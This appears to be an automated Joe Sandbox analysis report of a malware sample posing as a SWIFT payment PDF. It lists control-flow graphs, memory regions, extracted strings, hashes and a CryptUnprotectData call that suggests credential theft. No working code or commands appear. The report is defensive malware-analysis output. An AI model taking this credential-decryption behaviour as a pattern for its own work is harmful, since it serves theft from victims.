                                                                                                                                control_flow_graph 0 394ed6c1-394ed6f8 2 394ed6fe-394ed712 0->2 3 394edb29 0->3 4 394ed714-394ed73e 2->4 5 394ed741-394ed760 2->5 6 394edb2e-394edb44 3->6 4->5 12 394ed778-394ed77a 5->12 13 394ed762-394ed768 5->13 17 394ed77c-394ed794 12->17 18 394ed799-394ed7a2 12->18 15 394ed76c-394ed76e 13->15 16 394ed76a 13->16 15->12 16->12 17->6 19 394ed7aa-394ed7b1 18->19 20 394ed7bb-394ed7c2 19->20 21 394ed7b3-394ed7b9 19->21 23 394ed7cc 20->23 24 394ed7c4-394ed7ca 20->24 22 394ed7cf-394ed7ec call 394ec5c0 21->22 27 394ed7f2-394ed7f9 22->27 28 394ed941-394ed945 22->28 23->22 24->22 27->3 31 394ed7ff-394ed83c 27->31 29 394ed94b-394ed94f 28->29 30 394edb14-394edb27 28->30 32 394ed969-394ed972 29->32 33 394ed951-394ed964 29->33 30->6 39 394edb0a-394edb0e 31->39 40 394ed842-394ed847 31->40 34 394ed974-394ed99e 32->34 35 394ed9a1-394ed9a8 32->35 33->6 34->35 37 394ed9ae-394ed9b5 35->37 38 394eda47-394eda5c 35->38 42 394ed9b7-394ed9e1 37->42 43 394ed9e4-394eda06 37->43 38->39 53 394eda62-394eda64 38->53 39->19 39->30 44 394ed879-394ed88e call 394ec5e4 40->44 45 394ed849-394ed857 call 394ec5cc 40->45 42->43 43->38 81 394eda08-394eda12 43->81 51 394ed893-394ed897 44->51 45->44 55 394ed859-394ed877 call 394ec5d8 45->55 56 394ed908-394ed915 51->56 57 394ed899-394ed8ab call 394e0938 call 394ec5f0 51->57 58 394eda66-394eda9f 53->58 59 394edab1-394edace call 394ec5c0 53->59 55->51 56->39 73 394ed91b-394ed925 call 394ec600 56->73 84 394ed8ad-394ed8dd 57->84 85 394ed8eb-394ed903 57->85 76 394edaa8-394edaaf 58->76 77 394edaa1-394edaa7 58->77 59->39 72 394edad0-394edafc WaitMessage 59->72 78 394edafe 72->78 79 394edb03 72->79 87 394ed927-394ed92a call 394ec60c 73->87 88 394ed934-394ed93c call 394ec618 73->88 76->39 77->76 78->79 79->39 92 394eda2a-394eda45 81->92 93 394eda14-394eda1a 81->93 99 394ed8df 84->99 100 394ed8e4 84->100 85->6 95 394ed92f 87->95 88->39 92->38 92->81 97 394eda1e-394eda20 93->97 98 394eda1c 93->98 95->39 97->92 98->92 99->100 100->85
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $zO9$$zO9$$zO9$$zO9$<0?8
                                                                                                                                • API String ID: 0-4027080649
                                                                                                                                • Opcode ID: 7b38f8bcebe8c217329a6026afe915e3d7e3561ba951f9324b5642d7e8d4b3f1
                                                                                                                                • Instruction ID: 56ecb75de723f952e5b2edd9558ce92214274ac586255b175ec0f9d472191f3d
                                                                                                                                • Opcode Fuzzy Hash: 7b38f8bcebe8c217329a6026afe915e3d7e3561ba951f9324b5642d7e8d4b3f1
                                                                                                                                • Instruction Fuzzy Hash: 68D14879E00309CFEB04DFA5C844B9DBBB2BF88305F558558D405AF3A5DB71A946CB90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 287 36004328-36004368 289 3600436a 287->289 290 3600436f-3600444c call 36003168 call 36002c88 287->290 289->290 300 36004453-36004471 290->300 301 3600444e 290->301 331 36004474 call 36004620 300->331 332 36004474 call 36004612 300->332 301->300 302 3600447a-36004485 303 36004487 302->303 304 3600448c-36004490 302->304 303->304 305 36004492-36004493 304->305 306 36004495-3600449c 304->306 307 360044b4-360044f8 305->307 308 360044a3-360044b1 306->308 309 3600449e 306->309 313 3600455e-36004575 307->313 308->307 309->308 315 36004577-3600459c 313->315 316 360044fa-36004510 313->316 322 360045b4 315->322 323 3600459e-360045b3 315->323 320 36004512-3600451e 316->320 321 3600453a 316->321 324 36004520-36004526 320->324 325 36004528-3600452e 320->325 326 36004540-3600455d 321->326 323->322 327 36004538 324->327 325->327 326->313 327->326 331->302 332->302
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                • API String ID: 0-1487592376
                                                                                                                                • Opcode ID: e73e569321816b4c782701ad12982d15f7f9b17465848ed6aba863aa70311348
                                                                                                                                • Instruction ID: 4addcf03ae7c8aeb55e0e1ec9760724fbe571d80864b928fe544e3d37998cd01
                                                                                                                                • Opcode Fuzzy Hash: e73e569321816b4c782701ad12982d15f7f9b17465848ed6aba863aa70311348
                                                                                                                                • Instruction Fuzzy Hash: 5581C774E00218DFEB14CFA9D984A9DBBF2BF89301F14D0A9E418AB365DB349985CF54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o^q$4'^q$4'^q
                                                                                                                                • API String ID: 0-3969877745
                                                                                                                                • Opcode ID: 5240103dc53c32646858b988ebc65aaa0a4c5a767c860448f28a384f1b001d07
                                                                                                                                • Instruction ID: e3e8a8de661f61eb9c42e262d222be70fa67041eb1be0f81abf7b7a25f0e1e8b
                                                                                                                                • Opcode Fuzzy Hash: 5240103dc53c32646858b988ebc65aaa0a4c5a767c860448f28a384f1b001d07
                                                                                                                                • Instruction Fuzzy Hash: 83929F74A00209CFEB05CF69C985A9EBFF6FF89304F258599E4459B261DB30E981CF91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 779 360027b9-360027e4 780 36002805-36002853 779->780 781 360027e6-36002804 779->781 783 36002876-36002878 780->783 784 36002856-36002858 780->784 781->780 785 3600287a-360028a4 783->785 784->785 786 3600285a-36002873 784->786 787 360028c6-360028eb 785->787 788 360028a6-360028c4 785->788 786->783 789 3600290e-36002910 787->789 790 360028ee-360028f0 787->790 788->787 791 36002912-36002918 789->791 790->791 792 360028f2-3600290b 790->792 793 3600291a-3600292c 791->793 794 3600293c 791->794 792->789 795 3600294e-36002953 793->795 796 3600292e-36002934 793->796 797 3600295e-36002978 794->797 798 3600293e-3600294c 794->798 799 36002956-3600295c 795->799 796->799 800 36002936-3600293a 796->800 801 3600299a-3600299d 797->801 802 3600297a-3600297c 797->802 798->795 799->797 800->794 803 3600299e-360029a0 801->803 802->803 804 3600297e-36002980 802->804 805 360029a2-360029a4 803->805 804->805 806 36002982-36002984 804->806 807 360029a6-360029a8 805->807 806->807 808 36002986-36002988 806->808 809 360029aa-36002a54 807->809 808->809 810 3600298a-36002999 808->810 812 36002a56-36002a77 809->812 813 36002a79-36002b38 809->813 810->801 812->813 814 36002b3a-36002b40 813->814 815 36002b5d-36002c50 813->815 814->815 816 36002c52-36002c75 815->816 817 36002c77-36002ca1 815->817 820 36002cb2-36002cba 817->820 821 36002ca3-36002ca5 817->821 825 36002cbc-36002cca 820->825 823 36002ca7-36002ca9 821->823 824 36002cab-36002cb0 821->824 823->825 824->825 829 36002ce0-36002ce8 825->829 830 36002ccc-36002cce 825->830 833 36002ceb-36002cee 829->833 831 36002cd0-36002cd5 830->831 832 36002cd7-36002cde 830->832 831->833 832->833 835 36002cf0-36002cfe 833->835 836 36002d05-36002d09 833->836 835->836 843 36002d00 835->843 837 36002d22-36002d25 836->837 838 36002d0b-36002d19 836->838 839 36002d27-36002d2b 837->839 840 36002d2d-36002d62 837->840 838->837 848 36002d1b 838->848 839->840 842 36002d64-36002d7b 839->842 849 36002dc4-36002dc9 840->849 846 36002d81-36002d8d 842->846 847 36002d7d-36002d7f 842->847 843->836 850 36002d97-36002da1 846->850 851 36002d8f-36002d95 846->851 847->849 848->837 853 36002da9 850->853 854 36002da3 850->854 851->853 855 36002db1-36002dbd 853->855 854->853 855->849
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Xbq$Xbq
                                                                                                                                • API String ID: 0-1243427068
                                                                                                                                • Opcode ID: 5472fc7883dca40e2e1c3967676c8d5c76399d8c9f2fb97c7472f03ed9182049
                                                                                                                                • Instruction ID: 4d9c1a70f604c75a47b896d0a741b41421bfc1b8112d7e09b81f7a5a3326f0ed
                                                                                                                                • Opcode Fuzzy Hash: 5472fc7883dca40e2e1c3967676c8d5c76399d8c9f2fb97c7472f03ed9182049
                                                                                                                                • Instruction Fuzzy Hash: F632D5A395D3D66FDB270B384CB9280BFA19F67260B6A09DFD0C046097E69119C7C727
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2964098501.00000000394E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_394e0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Te^q
                                                                                                                                • API String ID: 0-671973202
                                                                                                                                • Opcode ID: 28cfbd93f0844060c3d514d051948ec6e161b7400e3e93ca4eaadf37bc108f21
                                                                                                                                • Instruction ID: 041d7147a73632e183f82cb43155b32d87d97a2d91b797ac978a25854a0d6d4d
                                                                                                                                • Opcode Fuzzy Hash: 28cfbd93f0844060c3d514d051948ec6e161b7400e3e93ca4eaadf37bc108f21
                                                                                                                                • Instruction Fuzzy Hash: 1482D474A40218CFDB25DF64C995BADBBB2FB89300F5085E9D409A7364DB35AE82CF50
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Te^q
                                                                                                                                • API String ID: 0-671973202
                                                                                                                                • Opcode ID: f0fa2f1d6e8a95cf1a594ac02497606b6c74beee9b9fecf25342ea8f0a1f20a0
                                                                                                                                • Instruction ID: 64ab79ea26c39b7812c5357973e027cbf06253fbcf2dd3c172a5c36123b56121
                                                                                                                                • Opcode Fuzzy Hash: f0fa2f1d6e8a95cf1a594ac02497606b6c74beee9b9fecf25342ea8f0a1f20a0
                                                                                                                                • Instruction Fuzzy Hash: CE72B274A41218CFDB25DF64C995BADBBB2FB89300F5085E9D409A7364CB35AE82CF50
                                                                                                                                APIs
                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3841DA45
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 834300711-0
                                                                                                                                • Opcode ID: 905e76675feaf690bea8d633389b3a123e545710977790c2181aa669f8d85ef3
                                                                                                                                • Instruction ID: 6b66a4abcec9c58d8f2796cf980572b262fad03611d9e137dbd06bc9378c3b74
                                                                                                                                • Opcode Fuzzy Hash: 905e76675feaf690bea8d633389b3a123e545710977790c2181aa669f8d85ef3
                                                                                                                                • Instruction Fuzzy Hash: 281167B6800249DFDB10CF99C445BEEBFF0EF48320F148419E959A7611C339A591CFA1
                                                                                                                                APIs
                                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3841DA45
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 834300711-0
                                                                                                                                • Opcode ID: d74083675e34f89ec0c5cb5813811d02e3410a25d708892e76713eed2ae4fb55
                                                                                                                                • Instruction ID: a0fed3dc75ec2572cba2b01bad58644f9cdc38b39bc5f018224df26c3f3e9763
                                                                                                                                • Opcode Fuzzy Hash: d74083675e34f89ec0c5cb5813811d02e3410a25d708892e76713eed2ae4fb55
                                                                                                                                • Instruction Fuzzy Hash: 211156B6800349DFCB10CF99C805BDEBFF4EB48320F148419EA18A7610C739A950CFA5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ?8
                                                                                                                                • API String ID: 0-494151269
                                                                                                                                • Opcode ID: d7d7b4a235760fa574d66a378f42c2116f3f41293e40b24c201d823a56d47388
                                                                                                                                • Instruction ID: 30580671bf65bb584741d08584437176aed1726e04af67af504151cf48da2cc6
                                                                                                                                • Opcode Fuzzy Hash: d7d7b4a235760fa574d66a378f42c2116f3f41293e40b24c201d823a56d47388
                                                                                                                                • Instruction Fuzzy Hash: 98A1F374E00208CFEB14DFA9C584B9DBBB1BF89304F209269E449AB3A1DB749985CF54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ?8
                                                                                                                                • API String ID: 0-494151269
                                                                                                                                • Opcode ID: 2ec9e8b1408e28451d4a97644566832bff255e7518ba99149677b38f498df932
                                                                                                                                • Instruction ID: 56f1c1810314c15a7927957957ac78bbb6420cc51c9f1e1278e2c0de1702dda1
                                                                                                                                • Opcode Fuzzy Hash: 2ec9e8b1408e28451d4a97644566832bff255e7518ba99149677b38f498df932
                                                                                                                                • Instruction Fuzzy Hash: BAA1D274E00208CFEB14DFA9C984B9DBBB1BF89314F209269E409BB391DB749985CF55
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0^C8
                                                                                                                                • API String ID: 0-1142653023
                                                                                                                                • Opcode ID: f18ab02f7222201f9a1a374ec41862d66c849fc1d6a229c29f88a6b891729866
                                                                                                                                • Instruction ID: 7abe5882c48ffab48bccb800f9a7594adc80c43ed0ab5755766027000bd06a66
                                                                                                                                • Opcode Fuzzy Hash: f18ab02f7222201f9a1a374ec41862d66c849fc1d6a229c29f88a6b891729866
                                                                                                                                • Instruction Fuzzy Hash: 0DA1A0B5E01228CFEB14CF6AC944B9DBBF2AB89300F14C5AAD408B7254DB745A85CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0^C8
                                                                                                                                • API String ID: 0-1142653023
                                                                                                                                • Opcode ID: 5b86047144133b88adb57f072e1cd958bf5181f0e97be12bc7cdf2a51ad449da
                                                                                                                                • Instruction ID: cb22823dd44113daa5f9f9a344fbd7243c2ad37fc6e069eb183deed77b514824
                                                                                                                                • Opcode Fuzzy Hash: 5b86047144133b88adb57f072e1cd958bf5181f0e97be12bc7cdf2a51ad449da
                                                                                                                                • Instruction Fuzzy Hash: D0A190B5E012288FEB14CF6AC944B9DBBF2AF89300F14C5AAD40CB7255EB745A85CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0^C8
                                                                                                                                • API String ID: 0-1142653023
                                                                                                                                • Opcode ID: 4eae040cf738af2259692545e72fdfbd462312840d9aafedd897944a66e1965b
                                                                                                                                • Instruction ID: 0cad67cb53308c09fde4cd39a04aaaa46bc80e26ac8e9bd537a0fe0863c223f3
                                                                                                                                • Opcode Fuzzy Hash: 4eae040cf738af2259692545e72fdfbd462312840d9aafedd897944a66e1965b
                                                                                                                                • Instruction Fuzzy Hash: E2A1A1B5E012288FEB24CF6AC944B9DFBF2AF89300F14D5AAD408B7255DB345A85CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0^C8
                                                                                                                                • API String ID: 0-1142653023
                                                                                                                                • Opcode ID: 853046058504aef1f31688bb500f3470b6e6d0ae1171b52eb7a63ec4e2710f8a
                                                                                                                                • Instruction ID: b14c3d205d6e3a6c962cbcd3dd5a0b01f6ca9c49b916c76eb6c1d7e2ebabb085
                                                                                                                                • Opcode Fuzzy Hash: 853046058504aef1f31688bb500f3470b6e6d0ae1171b52eb7a63ec4e2710f8a
                                                                                                                                • Instruction Fuzzy Hash: 5BA192B5E012288FEB54CF6AC944B9DBBF2AF89300F14D5AAD408B7255EB345A85CF11
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0^C8
                                                                                                                                • API String ID: 0-1142653023
                                                                                                                                • Opcode ID: 33146b31ed4d09d9d81283f72ae1de8ced962f046704aebe0674068c5d230b60
                                                                                                                                • Instruction ID: 7d4f0bf021ba4141dc5c787082f3815fd4754ff8f8a6a927d1fd14ea76aeb16d
                                                                                                                                • Opcode Fuzzy Hash: 33146b31ed4d09d9d81283f72ae1de8ced962f046704aebe0674068c5d230b60
                                                                                                                                • Instruction Fuzzy Hash: 4971B3B5E016288FEB68CF66C944B9DBBF2AF88300F14C5EAD40DA7255DB344A85CF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 0^C8
                                                                                                                                • API String ID: 0-1142653023
                                                                                                                                • Opcode ID: 726e458098a3323929b512192b63f7986ce990efe4f764c2c4b4e5302002be78
                                                                                                                                • Instruction ID: 70c9d6e1c293534ef68c1fc00b1da4354b2d99be8ca67b63536188f2cb3f5d3a
                                                                                                                                • Opcode Fuzzy Hash: 726e458098a3323929b512192b63f7986ce990efe4f764c2c4b4e5302002be78
                                                                                                                                • Instruction Fuzzy Hash: 267193B5E016188FEB28CF6AC944B9DBBF2AF88300F14C5EAD40DA7255DB345A85CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b393007857e63c78bcc626eb8f3cc89e5c478b35080c923b43454df75f422433
                                                                                                                                • Instruction ID: 2badf04e437650b4d16ac9a680e68ab9172ffc6c5868973874194efa7b5d566b
                                                                                                                                • Opcode Fuzzy Hash: b393007857e63c78bcc626eb8f3cc89e5c478b35080c923b43454df75f422433
                                                                                                                                • Instruction Fuzzy Hash: 5E72AEB5E01228CFDB65DF6AC980BD9BBB2BB89340F5095E9D408A7351DB349E81CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b5df4a052c277ecf70e4e11d91d8749d5abf6757e13ac814f1909a0f6feced4b
                                                                                                                                • Instruction ID: cbfabef0470bea24bb2c5c3284a2999f7e7d6e79ed9a4bd23affd98ec9e0b3c1
                                                                                                                                • Opcode Fuzzy Hash: b5df4a052c277ecf70e4e11d91d8749d5abf6757e13ac814f1909a0f6feced4b
                                                                                                                                • Instruction Fuzzy Hash: 0412B5B04057458ED32ACFA5C84E1997BB2BF65F28BB04609D3657B2E1E7B4114BCF48
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9fea39ad751e43cd942ed21e36fdd176f88fe3438e90fa47cefc60253e0d5e37
                                                                                                                                • Instruction ID: ebd6b4412f3441861c17a8022e35a26444d5a293b2e6e0a261cdd54e19fd02ad
                                                                                                                                • Opcode Fuzzy Hash: 9fea39ad751e43cd942ed21e36fdd176f88fe3438e90fa47cefc60253e0d5e37
                                                                                                                                • Instruction Fuzzy Hash: 76E1C374E01218CFEB14CFA5C994B9DBBB2BF89304F2081A9D409B7394DB755A86CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7fff2e253ef77bdd6f1589207fc798e1caf2d3eaaec205608919ad88fc39c3a4
                                                                                                                                • Instruction ID: c75fcc0d76ee83940190b77b44834faba95a5df6db2e4f83bc2e00b0d0f1c7b0
                                                                                                                                • Opcode Fuzzy Hash: 7fff2e253ef77bdd6f1589207fc798e1caf2d3eaaec205608919ad88fc39c3a4
                                                                                                                                • Instruction Fuzzy Hash: E6D1A074E01218CFDB54DFA5C994B9DBBB2BF89300F1081A9D809BB764DB359A86CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0de4e9a0af92d46896de3348ef9e31cf894bf1e4a5b16f003ea7fe6f9ac5a3d6
                                                                                                                                • Instruction ID: 3cba535cf01f92273a6d2f4795285ced923c125484eff8d4b0282b72c0793541
                                                                                                                                • Opcode Fuzzy Hash: 0de4e9a0af92d46896de3348ef9e31cf894bf1e4a5b16f003ea7fe6f9ac5a3d6
                                                                                                                                • Instruction Fuzzy Hash: 3BC1BD78E00218CFDB55DFA5C994B9DBBB2AF89300F6085A9D408AB364DB359E85CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963271547.0000000038410000.00000040.00000800.00020000.00000000.sdmp, Offset: 38410000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38410000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ec94ec9a5ca663a99f89eb6cb7ab3cdae5f5fcc45a7338ec206effa4a41987e1
                                                                                                                                • Instruction ID: 1cffffc2d531ed12538f72de79c1e420a9741f2fa68d45c0a64fe6a8df107ee5
                                                                                                                                • Opcode Fuzzy Hash: ec94ec9a5ca663a99f89eb6cb7ab3cdae5f5fcc45a7338ec206effa4a41987e1
                                                                                                                                • Instruction Fuzzy Hash: 5B91C074D00208CFEB10DFA9C988B9CBBB1BF49314F2092A9E509BB791DB759985CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_38fb0000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6b1ced6387004a7fea4e0dd732ffbf86f4806a8bea322f2df3a1a8a84d996307
                                                                                                                                • Instruction ID: 501721a752b842865235a7e35762ea2f049fb2f8bc9d0d90966e3976023210ac
                                                                                                                                • Opcode Fuzzy Hash: 6b1ced6387004a7fea4e0dd732ffbf86f4806a8bea322f2df3a1a8a84d996307
                                                                                                                                • Instruction Fuzzy Hash: 6E81D5B4E01648CBEB14DFAAD99069DBBF2BF88310F24D929E414AB358DB345942CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2960984662.0000000036000000.00000040.00000800.00020000.00000000.sdmp, Offset: 36000000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_36000000_SWIFT091816-24_pdf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9adbd63a60457eb1752364e864321258e0f2db7d89e0582af074befe4a783965
                                                                                                                                • Instruction ID: 7e067a98f641da29365499df5abc1c2b463984a24df08828feb759ca34e72890
                                                                                                                                • Opcode Fuzzy Hash: 9adbd63a60457eb1752364e864321258e0f2db7d89e0582af074befe4a783965
                                                                                                                                • Instruction Fuzzy Hash: 14610375E05349CFDB09CFB9D99089DBFB2BF8A300B6484A9E445AB321DB359842CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2963886192.0000000038FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FB0000, based on PE: false
